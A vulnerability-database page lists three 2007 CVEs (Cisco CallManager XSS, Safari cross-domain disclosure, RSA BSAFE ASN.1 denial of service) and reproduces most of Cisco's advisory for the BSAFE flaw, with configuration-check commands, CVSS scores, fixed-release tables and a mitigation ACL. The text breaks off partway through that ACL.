VARIoT IoT vulnerabilities database
 
    | VAR-200705-0086 | CVE-2007-2832 | Cisco CallManager of Web Application firewall cross-site scripting vulnerability | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            Cross-site scripting (XSS) vulnerability in the web application firewall in Cisco CallManager before 3.3(5)sr3, 4.1 before 4.1(3)sr5, 4.2 before 4.2(3)sr2, and 4.3 before 4.3(1)sr1 allows remote attackers to inject arbitrary web script or HTML via the pattern parameter to CCMAdmin/serverlist.asp (aka the search-form) and possibly other unspecified vectors. Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. 
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 
Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected
                        
| VAR-200705-0087 | CVE-2007-2843 | Apple Safari Vulnerable to access to restricted information from other domains | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Cross-domain vulnerability in Apple Safari 2.0.4 allows remote attackers to access restricted information from other domains via Javascript, as demonstrated by a js script that accesses the location information of cross-domain web pages, probably involving setTimeout and timed events. Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions. 
Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks. 
This issue affects Safari 2.0.4; other versions may also be affected
                        
| VAR-200705-0570 | CVE-2006-3894 | RSA BSAFE libraries denial of service vulnerability Related entries in the VARIoT exploits database: VAR-E-200705-0522 | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            The RSA Crypto-C before 6.3.1 and Cert-C before 2.8 libraries, as used by RSA BSAFE, multiple Cisco products, and other products, allows remote attackers to cause a denial of service via malformed ASN.1 objects. The RSA BSAFE Crypto-C and Cert-C libraries contain a denial-of-service vulnerability. RSA Security provides RSA BSAFE Cert-C and Crypto-C For implementing digital certificate processing and cryptographic algorithms respectively C/C++ A library for languages. RSA BSAFE Cert-C and Crypto-C Crafted by ASN.1 There is a problem with object processing, and there is a problem that the library falls into an infinite loop.Service operation disrupted by a remote third party (DoS) There is a possibility of being attacked. 
Exploiting this vulnerability allows attackers to crash applications that use the affected library. The specific impact of this vulnerability depends on the nature of the applications. Local and remote attacks may be possible. Depending on the nature of vulnerable applications, attackers may be able to exploit this issue without authentication. 
These versions are vulnerable:
RSA BSAFE Crypto-C prior to 6.3.1
Cert-C prior to 2.8
The vendor tracks this issue by RSA Bug ID 46337. 
Cisco tracks this issue as Bug IDs:
Cisco IOS: CSCsd85587
Cisco IOS XR: CSCsg41084
Cisco PIX and ASA Security Appliances: CSCse91999
Cisco Firewall Services Module (FWSM): CSCsi97695
Cisco Unified CallManager: CSCsg44348. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Vulnerability In Crypto Library
Advisory ID: cisco-sa-20070522-crypto.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml
Revision 1.0
For Public Release 2007 May 22 1300 UTC (GMT)
- ------------------------------------------------------------------------------
Summary
=======
A vulnerability has been discovered in a third party cryptographic library
which is used by a number of Cisco products. This vulnerability may be
triggered when a malformed Abstract Syntax Notation One (ASN.1) object is
parsed. Due to the nature of the vulnerability it may be possible, in some
cases, to trigger this vulnerability without a valid certificate or valid
application-layer credentials (such as a valid username or password). 
Successful repeated exploitation of any of these vulnerabilities may lead to a
sustained Denial-of-Service (DoS); however, vulnerabilities are not known to
compromise either the confidentiality or integrity of the data or the device. 
These vulnerabilities are not believed to allow an attacker will not be able to
decrypt any previusly encrypted information. It is externally
coordinated and is tracked by the following external coordinators:
  * JPCERT/CC - tracked as JVNVU#754281
  * CPNI - tracked as NISCC-362917
  * CERT/CC - tracked as VU#754281
Cisco has made free software available to address this vulnerability for
affected customers. There are no workarounds available to mitigate the effects
of the vulnerability. 
This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml. 
Note: Another related advisory is posted together with this Advisory. 
It also describes vulnerabilities related to cryptography that affect
Cisco IOS. A combined software table for Cisco IOS only is available at
http://www.cisco.com /warp/public/707/cisco-sa-20070522-cry-bundle.shtml
and can be used to choose a software release which fixes all
security vulnerabilities published as of May 22, 2007. It is sufficient that only one
protocol or feature is enabled in order for a devices to be vulnerable. In
order to be not vulnerable, all of the listed application protocols or features
must be disabled. 
Affected protocols in Cisco IOS
+------------------------------
To determine the software running on a Cisco IOS product, log in to the device
and issue the "show version" command to display the system banner. Cisco IOS
software will identify itself as "Internetwork Operating System Software" or
simply "IOS." On the next line of output, the image name will be displayed
between parentheses, followed by "Version" and the Cisco IOS release name. 
Other Cisco devices will not have the "show version" command, or will give
different output. 
Only Cisco IOS images that contain the Crypto Feature Set are vulnerable. 
Customers who are not running an IOS image with crypto support are not exposed
to this vulnerability. 
Cisco IOS feature set naming indicates that IOS images with crypto support have
'K8' or 'K9' in the feature designator field. 
The following example shows output from a device running an IOS image with
crypto support:
    Router>show version
    Cisco IOS Software, 7200 Software (C7200-IK9S-M), Version 12.3(14)T1, RELEASE SOFTWARE (fc1)
    Technical Support: http://www.cisco.com/techsupport
    Copyright (c) 1986-2005 by Cisco Systems, Inc. 
    Compiled Thu 31-Mar-05 08:04 by yiyan
Since the feature set designator (IK9S) contains 'K9', it can be determine that
this feature set contains crypto support. 
Additional information about Cisco IOS release naming is available at the
following link: 
http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_white_paper09186a008018305e.shtml. 
You are affected by this vulnerability if you are running one of the vulnerable
IOS software releases and have, at least one, of the following protocols or
features enabled:
  * Internet Security Association and Key Management Protocol (ISAKMP)
  * In some IOS releases the Secure Socket Layer (SSL) may also be affected
  * Threat Information Distribution Protocol (TIDP)
  * Cisco IOS SIP Gateway Signaling Support Over TLS (SIP-TLS)
  * Extensible Authentication Protocol-Transport Layer Security (EAP-TLS)
As some other protocols may use affected crypto library the most accurate way
to determine if your IOS release is vulnerable is to consult fixed IOS releases
table. 
Internet Security Association and Key Management Protocol (ISAKMP)
+-----------------------------------------------------------------
To determine if your device has ISAKMP enabled, enter the command 
"show crypto isakmp policy". Below is an example of a device that has 
ISAKMP enabled. 
    Router#show crypto isakmp policy
    Global IKE policy
    Protection suite of priority 1
    <more output>
If your output is like in the following example then you do not have IKE
enabled on your device. 
    Router#show crypto isakmp policy
    ISAKMP is turned off
In Cisco IOS two features rely on ISAKMP - IPSec and Group Domain of
Interpretation (GDOI). Presence of either of these features is detected by the
previous example. 
Prior to IOS version 12.3(8)T, IKE was enabled by default, with no crypto
configuration needed for the IOS device to process IKE messages. 
12.2SXD versions of Cisco IOS have IKE enabled by default. To ensure that IKE
processing is disabled, enter the global configuration command 
"no crypto isakmp enable". 
As of IOS version 12.3(2)T (which includes all 12.4-based versions), crypto
configuration is required to enable IKE message processing. 
In order for an IOS device to be vulnerable crypto map must be explicilty
configured and applied to an interface. 
Secure Socket Layer (SSL)
+------------------------
In some Cisco IOS software releases the vulnerable library is used to process
elements of SSL functionalities. SSL is used to protect several application
layer protocols like Hyper Text Transfer Protocol over SSL (HTTPS). 
HTTPS is not the only protocol that may use SSL but it is the most commonly
known. In order to determine if your device has HTTPS configured enter the
command "show running | include secure". Below is an example of a device 
that has HTTPS enabled. 
    router#show running | include secure-server
    ip http secure-server
Threat Information Distribution Protocol (TIDP)
+----------------------------------------------
To determine if your device has TDIP enabled, enter the command 
"show running-config | include parameter-map". Below is an example of a 
device that has TDIP enabled. 
    router#show running | include parameter-map
    parameter-map type tms TMS_PAR
Cisco IOS SIP Gateway Signaling Support Over TLS (SIP-TLS)
+---------------------------------------------------------
To determine if your device has SIP-TLS enabled, enter the command 
"show running-config | include crypto signaling". Below is an example of 
a device that has SIP-TLS enabled. 
    router#show running | include crypto signaling
    crypto signaling default trustpoint user1
Extensible Authentication Protocol-Transport Layer Security (EAP-TLS)
+--------------------------------------------------------------------
To determine if your device has EAP-TLS enabled, enter the command 
"show running-config | include method". Below is an example of a device 
that has EAP-TLS enabled. 
    Router#show running | include method
    method tls
Affected protocols in Cisco IOS XR
+---------------------------------
You are affected by this vulnerability if you are running one of the vulnerable
Cisco IOS XR software releases and have, at least one, of the following
protocols or features enabled:
  * Internet Security Association and Key Management Protocol (ISAKMP)
  * In some IOS XR releases the Secure Socket Layer (SSL) may also be affected
  * Secure Shell (SSH)
Internet Security Association and Key Management Protocol (ISAKMP)
+-----------------------------------------------------------------
To determine if your device has ISAKMP enabled, enter the command 
"show running-config | include isakmp". Below is an example of a device 
that has IKE enabled. 
    Router#show running-config | include isakmp
           crypto isakmp
           crypto isakmp policy 1
           crypto isakmp profile profile-a
Secure Socket Layer (SSL)
+------------------------
SSL is used to provide secure communications to the application layer
protocols like Hyper Text Transfer Protocol over SSL (HTTPS) and Object
Request Brokers (ORB). To determine if your device has any service
enabled that uses SSL, enter one of the following commands 
"show running-config | include http server ssl" or 
"show running-config | include xml agent corba ssl". Below is an example 
of a device that has both of the services enabled. 
    Router#show running-config | include http server ssl
           http server ssl
    Router#show running-config | include xml agent corba ssl
           xml agent corba ssl
Secure Shell (SSH)
+-----------------
SSH is an application and a protocol that provides secure replacement for the
suite of Berkeley r-tools such as rsh, rlogin and rcp. It is highly prefered
over Telnet for interactive sessions. To determine if your device has SSH
enabled enter the command "show running-config | include ssh server". Below 
is an example of a device that has SSH enabled. 
    Router#show running-config | include ssh server
           ssh server
           ssh server rate-limit 100
Affected protocols in Cisco PIX and ASA Security Appliances
+----------------------------------------------------------
You are affected by this vulnerability if you are running one of the vulnerable
Cisco PIX and ASA software releases and have, at least one, of the following
protocols or features enabled:
  * Secure Shell (SSH)
  * Internet Security Association and Key Management Protocol (ISAKMP)
  * Secure Socket Layer (SSL)
Secure Shell (SSH)
+-----------------
To determine if a device has SSH enabled, enter the command "show running" 
and observe the output. If it contains the line as in the following example 
then SSH is enabled. 
    PIX#show running
    .... 
    ssh <host_IP_address> <host_netmask> <interface>
    .... 
Internet Security Association and Key Management Protocol (ISAKMP)
+-----------------------------------------------------------------
To determine if a device has ISAKMP enabled, enter the command "show running" 
and observe the output. If it contains the lines as in the following 
example then ISAKMP is enabled. 
    PIX#show running
    .... 
    crypto isakmp policy 2
     authentication rsa-sig
    .... 
Secure Socket Layer (SSL)
+------------------------
SSL is used to protect several application layer protocols like Hyper Text
Transfer Protocol over SSL (HTTPS) and Cisco Adaptive Security Device Manager
(ASDM) session. 
To determine if a device has SSL enabled, enter the command "show running" 
and observe the output. If it contains the line as in the following 
example then SSL is enabled. 
    PIX#show running
    .... 
    http server enable
    .... 
Affected protocols in Cisco Unified CallManager
+----------------------------------------------
You are affected by this vulnerability if you are running one of the vulnerable
Cisco Unified CallManager software releases and have, at least one, of the
following protocols or features enabled:
  * Certificate Authority Proxy Function (CAPF)
  * Cisco TAPI Service Provider (Cisco Unified CallManager TSP)
Certificate Authority Proxy Function (CAPF)
+------------------------------------------
CAPF is automatically installed with Cisco CallManager but is disabled by
default. In order to verify if CAPF is enabled on your Unified CallManager do
the following steps. 
  * Step 1 - In Cisco CallManager Administration, choose Service > Service
    Parameter. 
  * Step 2 - If you are running 4.x software then do the following: from the
    Server drop-down list box, choose the publisher database server. If you are
    running 5.x software then do the following: From the Server drop-down list
    box, choose the first node. 
  * Step 3 - From the Service drop-down list box, choose the Cisco Certificate
    Authority Proxy Function service. 
If you are given CAPF parameters then CAPF is running on your system. 
Cisco TAPI Service Provider (Cisco Unified CallManager TSP)
+----------------------------------------------------------
In order to determine if Cisco Unified CallManager TSP is installed open
Windows Control Panel (Start > Control Panel) and click on Add/Remove Programs. 
If 'Cisco Unity-CM TSP' is listed then you have it installed on your system. 
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by this
vulnerability. Specifically, the following product's features or products are
known not to be affected:
  * Cisco IOS
      + Secure Shell (SSH)
      + Secure Copy (SCP)
  * Cisco Unified Call Manager
      + Hyper Text Transfer Protocol over SSL (HTTPS)
      + Cisco Unified CallManager is configured for Secure Survivable Remote
        Site Telephony (SRST)
  * MeetingPlace Express and MeetingPlace for Telepresence
  * Cisco IP Communicator
  * All Cisco Unified IP Phones 7900 Series
  * CIP TN3270 Server
  * Cisco GSS 4400 Series Global Site Selector Appliances
  * Cisco CatOS
The list is not exhaustive. 
Details
=======
ASN.1 is defined by ITU-T (International Telecommunication Union -
Telecommunication Standardization Sector) standards and it describes, among
other things, data structures for encoding values. The vulnerability addressed
by this advisory is related to the implementation of parsing certain data
structures and is not a vulnerability in the standard itself. 
Protocols that use ASN.1 (e.g., voice over IP, Simple Network Management
Protocol and others), but do not rely on the vulnerable crypto library, are not
affected. This advisory only addresses an implementation issue in a particular
crypto library from a single vendor. 
Cisco will provide a base and temporal score. Customers can then compute
environmental scores to assist in determining the impact of the vulnerability
in individual networks. 
Cisco PSIRT will set the bias in all cases to normal. Customers are encouraged
to apply the bias parameter when determining the environmental impact of a
particular vulnerability. 
CVSS is a standards based scoring method that conveys vulnerability severity
and helps determine urgency and priority of response. 
Cisco has provided an FAQ to answer additional questions regarding CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. 
Cisco has also provided a CVSS calculator to help compute
the environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss. 
Cisco Bug IDs:
CSCsd85587 - Router crashes when processing ISAKMP message
CVSS Base Score: 3.3
    Access Vector: Remote
    Access Complexity: Low
    Authentication: Not Required
    Confidentiality Impact: None
    Integrity Impact: None
    Availability Impact: Complete
    Impact Bias: Normal
CVSS Temporal Score: 2.7
    Exploitability: Functional
    Remediation Level: Official Fix
    Report Confidence: Confirmed
CSCsg41084 - IOS XR crashes when processing ISAKMP message
CVSS Base Score: 3.3
    Access Vector: Remote
    Access Complexity: Low
    Authentication: Not Required
    Confidentiality Impact: None
    Integrity Impact: None
    Availability Impact: Complete
    Impact Bias: Normal
CVSS Temporal Score: 2.7
    Exploitability: Functional
    Remediation Level: Official Fix
    Report Confidence: Confirmed
CSCse91999 - PIX/ASA crashes when processing ISAKMP message
CVSS Base Score: 3.3
    Access Vector: Remote
    Access Complexity: Low
    Authentication: Not Required
    Confidentiality Impact: None
    Integrity Impact: None
    Availability Impact: Complete
    Impact Bias: Normal
CVSS Temporal Score: 2.7
    Exploitability: Functional
    Remediation Level: Official Fix
    Report Confidence: Confirmed
CSCsg44348 - Unified CallManager crashes when processing crypto message
CVSS Base Score: 3.3
    Access Vector: Remote
    Access Complexity: Low
    Authentication: Not Required
    Confidentiality Impact: None
    Integrity Impact: None
    Availability Impact: Complete
    Impact Bias: Normal
CVSS Temporal Score: 2.7
    Exploitability: Functional
    Remediation Level: Official Fix
    Report Confidence: Confirmed
Impact
======
Successful exploitation of the vulnerability listed in this advisory may result
in the crash of a vulnerable device. Repeated exploitation can result in a
sustained DoS attack. 
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution. 
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance. 
Each row of the Cisco IOS software table (below) describes a release
train. If a given release train is vulnerable, then the earliest
possible releases that contain the fix (the "First Fixed Release")
and the anticipated date of availability for each are listed in the
"Rebuild" and "Maintenance" columns. A device running a release in the
given train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later version
(greater than or equal to the First Fixed Release label). 
For more information on the terms "Rebuild" and "Maintenance," consult the 
following URL:
http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/products_white_paper09186a008018305e.shtml
Cisco IOS
+--------
Fixed Cisco IOS software releases are listed in the table below. 
+-----------------------------------------------------------------------------+
|        Major Release         |      Availability of Repaired Releases       |
|------------------------------+----------------------------------------------|
| Affected 12.2-Based Release  | Rebuild             | Maintenance            |
|------------------------------+----------------------------------------------|
| 12.2B                        | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.2BC                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2BZ                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2CX                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2CZ                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2EW                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2EWA                      | 12.2(25)EWA9        |                        |
|------------------------------+----------------------------------------------|
| 12.2EX                       | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2EY                       | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2EZ                       | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2FX                       | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2FY                       | Vulnerable; migrate to 12.2(35)SE2 or later  |
|------------------------------+----------------------------------------------|
| 12.2FZ                       | Vulnerable; migrate to 12.2(35)SE2 or later  |
|------------------------------+----------------------------------------------|
| 12.2IXA                      | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2IXB                      | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2IXC                      | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2JA                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2JK                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.2SB                       | 12.2(31)SB3         |                        |
|------------------------------+---------------------+------------------------|
| 12.2SE                       | 12.2(35)SE2         |                        |
|------------------------------+----------------------------------------------|
| 12.2SEA                      | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2SEB                      | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2SEC                      | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2SED                      | Vulnerable; migrate to 12.2(25)SEE3 or later |
|------------------------------+----------------------------------------------|
| 12.2SEE                      | 12.2(25)SEE3        |                        |
|------------------------------+----------------------------------------------|
| 12.2SEF                      | Vulnerable; migrate to 12.2(35)SE2 or later  |
|------------------------------+----------------------------------------------|
| 12.2SEG                      | Vulnerable; migrate to 12.2(35)SE2 or later  |
|------------------------------+----------------------------------------------|
| 12.2SG                       |                     | 12.2(37)SG             |
|------------------------------+---------------------+------------------------|
| 12.2SGA                      | 12.2(31)SGA1        |                        |
|------------------------------+---------------------+------------------------|
| 12.2SRA                      | 12.2(33)SRA3        |                        |
|------------------------------+---------------------+------------------------|
| 12.2SRB                      |                     | 12.2(33)SRB            |
|------------------------------+----------------------------------------------|
| 12.2SXD                      | Vulnerable; migrate to 12.2(18)SXF8 or later |
|------------------------------+----------------------------------------------|
| 12.2SXE                      | Vulnerable; migrate to 12.2(18)SXF8 or later |
|------------------------------+----------------------------------------------|
| 12.2SXF                      | 12.2(18)SXF8        |                        |
|------------------------------+----------------------------------------------|
| 12.2T                        | Vulnerable; migrate to 12.3(22) or later     |
|------------------------------+----------------------------------------------|
| 12.2XR                       | Vulnerable; migrate to 12.3(22) or later     |
|------------------------------+----------------------------------------------|
| 12.2YU                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.2YV                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.2ZD                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2ZE                       | Vulnerable; migrate to 12.3(22) or later     |
|------------------------------+----------------------------------------------|
| 12.2ZF                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.2ZG                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2ZH                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2ZJ                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.2ZL                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2ZU                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.2ZW                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| Affected 12.3-Based Release  | Rebuild             | Maintenance            |
|------------------------------+---------------------+------------------------|
| 12.3                         |                     | 12.3(22)               |
|------------------------------+----------------------------------------------|
| 12.3B                        | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3BC                       | 12.3(17b)BC6        |                        |
|------------------------------+----------------------------------------------|
| 12.3JA                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3JEA                      | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3JK                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3JL                       | 12.3(2)JL1          |                        |
|------------------------------+----------------------------------------------|
| 12.3JX                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3T                        | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3TPC                      | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XA                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XB                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XC                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XD                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XE                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XF                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XG                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XH                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XI                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XJ                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XK                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XQ                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XR                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XS                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3XU                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3XW                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3XX                       | Vulnerable; migrate to 12.4(10) or later     |
|------------------------------+----------------------------------------------|
| 12.3YA                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3YD                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YF                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3YG                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YH                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YI                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YK                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YQ                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YS                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YT                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.3YU                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.3YX                       | 12.3(14)YX7         |                        |
|------------------------------+----------------------------------------------|
| 12.3YZ                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| Affected 12.4-Based Release  | Rebuild             | Maintenance            |
|------------------------------+---------------------+------------------------|
| 12.4                         | 12.4(7d)            | 12.4(10)               |
|------------------------------+---------------------+------------------------|
| 12.4SW                       | 12.4(11)SW1         |                        |
|------------------------------+---------------------+------------------------|
|                              | 12.4(6)T7           |                        |
|                              |---------------------+------------------------|
| 12.4T                        | 12.4(9)T3           |                        |
|                              |---------------------+------------------------|
|                              | 12.4(11)T1          |                        |
|------------------------------+----------------------------------------------|
| 12.4XA                       | Vulnerable; migrate to 12.4(6)T7 or later    |
|------------------------------+----------------------------------------------|
| 12.4XB                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.4XC                       | 12.4(4)XC6          |                        |
|------------------------------+---------------------+------------------------|
| 12.4XD                       | 12.4(4)XD6          |                        |
|------------------------------+----------------------------------------------|
| 12.4XE                       | Vulnerable; contact TAC                      |
|------------------------------+----------------------------------------------|
| 12.4XJ                       | 12.4(11)XJ2         |                        |
|------------------------------+----------------------------------------------|
| 12.4XP                       | Vulnerable; contact TAC                      |
+-----------------------------------------------------------------------------+
Cisco IOS XR
+-----------
The following table lists fixed Cisco IOS XR software. 
+---------------------------------------------------------------------+
|    Cisco IOS XR     |     SMU ID      |          SMU Name           |
|       Version       |                 |                             |
|---------------------+-----------------+-----------------------------|
| 3.2.3               | AA01802         | hfr-k9sec-3.2.3.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.2.4               | AA01801         | hfr-k9sec-3.2.4.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.2.6               | AA01800         | hfr-k9sec-3.2.6.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.3.0               | AA01799,        | hfr-k9sec-3.3.0.CSCsg41084  |
|                     | AA01780         |                             |
|---------------------+-----------------+-----------------------------|
| 3.3.0               | AA01780         | c12k-k9sec-3.3.0.CSCsg41084 |
|---------------------+-----------------+-----------------------------|
| 3.3.1               | AA01781         | c12k-k9sec-3.3.1.CSCsg41084 |
|---------------------+-----------------+-----------------------------|
| 3.3.1               | AA01798         | hfr-k9sec-3.3.1.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.3.2               | AA01797         | hfr-k9sec-3.3.2.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.3.3               | AA01796         | hfr-k9sec-3.3.3.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.3.3               | AA01785         | c12k-k9sec-3.3.3.CSCsg41084 |
|---------------------+-----------------+-----------------------------|
| 3.4.0               | AA01782         | c12k-k9sec-3.4.0.CSCsg41084 |
|---------------------+-----------------+-----------------------------|
| 3.4.0               | AA01795         | hfr-k9sec-3.4.0.CSCsg41084  |
|---------------------+-----------------+-----------------------------|
| 3.4.1               | AA01783         | c12k-k9sec-3.4.1.CSCsg41084 |
|---------------------+-----------------+-----------------------------|
| 3.4.1               | AA01794         | hfr-k9sec-3.4.1.CSCsg41084  |
+---------------------------------------------------------------------+
IOS XR Package Installation Envelopes (PIE) can be downloaded from File 
Exchange at:
https://upload.cisco.com/cgi-bin/swc/fileexg/main.cgi?CONTYPES=IOS-XR 
Installation instructions are included in the accompanying .txt files. 
Cisco PIX and ASA Security Appliance
+-----------------------------------
This vulnerability is fixed in the following 7.x software releases: 7.0(6.7),
7.1(2.27), 7.2(1.22), 7.2(2). All 8.x software releases do contain the fixed
library and are not affected. No 6.x software releases are affected by this
vulnerability. 
Cisco Firewall Service Module (FWSM)
+-----------------------------------
This vulnerability is fixed in the following software releases:
  * 2.3(5) maintenance release, expected in 2007-June
  * 3.1(6) maintenance release, expected in 2007-June
Cisco Unified CallManager
+------------------------
This vulnerability is fixed in the following software releases. 
  * 4.0(x) releases are vulnerable but no fix will be provided. Customers are
    advised to upgrade to the fixed 4.1 or 4.2 software. 
  * 4.1(3)sr.5 expected in 2007-May-24
  * 4.2(3)sr.2 expected in 2007-May
  * 4.3(1)sr.1 expected 2007-Jun
  * 5.0(4) - no fixed software planned, users should upgrade to 5.1(2)
  * 5.1(1) - no fixed software planned, users should upgrade to 5.1(2)
  * 5.1(2)
Workarounds
===========
The only way to prevent a device being susceptible to the listed
vulnerabilities is to disable the affected service(s). However, if regular
maintenance and operation of the device relies on these services then there is
no workaround. 
It is possible to mitigate these vulnerabilities by preventing
unauthorized hosts to access the affected devices. Additional mitigations 
that can be deployed on Cisco devices within the network are available 
in the Cisco Applied Intelligence companion document for this advisory:
http://www.cisco.com/warp/ public/707/cisco-air-20070522-crypto.shtml
Control Plane Policing (CoPP)
+----------------------------
Control Plane Policing: IOS software versions that support Control Plane
Policing (CoPP) can be configured to help protect the device from attacks that
target the management and control planes. CoPP is available in Cisco IOS
release trains 12.0S, 12.2SX, 12.2S, 12.3T, 12.4, and 12.4T. 
In the CoPP example below, the ACL entries that match the exploit packets with
the permit action will be discarded by the policy-map drop function, while
packets that match a deny action (not shown) are not affected by the policy-map
drop function. 
    !-- Include deny statements up front for any protocols/ports/IP addresses that
    !-- should not be impacted by CoPP
    !-- Include permit statements for the protocols/ports that will be governed by CoPP
    !-- port 443 - HTTPS
    access-list 100 permit tcp any any eq 443
    !-- port 500 - IKE
